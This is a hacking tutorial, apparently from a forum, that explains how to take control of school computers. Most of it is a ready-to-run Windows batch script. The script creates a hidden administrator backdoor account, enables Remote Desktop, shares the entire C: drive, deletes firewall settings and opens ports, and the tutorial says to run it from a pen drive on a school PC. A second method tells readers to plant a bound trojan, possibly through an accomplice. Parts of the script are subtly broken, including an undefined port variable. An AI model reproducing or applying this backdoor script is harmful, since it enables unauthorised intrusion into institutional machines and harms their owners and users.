How To Take Control Of Your School PC's
Today, i was talking with one of my friends about how to hack our school network . I found a good way to yake the control of The PC's at school...
- How To Take Over Your School PC -
1)Preparing The Virus
2)Setting Up The Virus
3)Controlling The PC
Preparing The Virus
Obviously, if you gonna take over your school PC you need a virus.You have 2 methods:
1)The virus I made which is harmless and you wont even notice it was executed.
2)Dropping a Trojan on the school PC.
Method 1:
What you need:
-Pen Drive(You can buy the worst there is or you can just use yours)
-Brains(You can't buy these)
Now, create a file named "something.bat"(witho ut the quotes) and you can change something by whatever you want.
Right click the file and click edit.Notepad should show up.
Now copy and paste the following code:
@echo off
REM ......: Created By Dfpirate :......
REM ......: Albooraq :......
set username=USERNAME
set password=PASSWORD
set rdport=3389
set tnport=23
set rport=CHANGE_THIS
REM Adding The Backdoor
net user %username% %password% /add
REM Pause For Process
ping localhost -n 2 >nul
REM Adding Admin Access The Backdoor
net localgroup Administrators %username% /add
REM Hiding The Backdoor From Start Menu
REG add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /%username% /t REG_DWORD /d 0 /f >nul
REM Enabling Terminal Service
REG add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0
REM Share C:\
net share system=C:\ /unlimited
REM Stealing The IP Stuff
ipconfig /all >> C:\attach.txt
REM Deleting The Firewall Configuration
netsh firewall delete
REM Opening Ports
netsh firewall add portopening TCP %rdport% "WinSvcService"
netsh firewall add portopening TCP %tnport2% "WinSvcService"
netsh firewall add portopening TCP %rport% "WinSvcService"
You can change the username, password and the rport(randomn port you choose to be opened)
At ipconfig /all >> C:\attach.txt you must change C:/ by your pen drive letter.
Save it and remove your pen drive.
Take your pen drive to school and run the bat file.Go to the
Don't forget the pc you runned it in cause you might need it.
When you get home go to your pc and try to telnet them or remote desktop the PC.Method 2:
In this method we will use a Trojan to control the school PC.
I'd recommend you to go to the backdoors section hacking Gempak.Org.
Now just create a server(shouldnt be hard if you own a brain).
When your finished creating the server bind it and put it into your pen drive.Make sure you leave your PC turned on.
Then go to your school and drop the trojan.
Other way to do this is to give your trojan to a rl and tell him to stay in school.When you arrive home, send him a SMS and tell him to drop the trojan.
This way you could even see if it worked.
After that you can probably do whatever you want with the PC.
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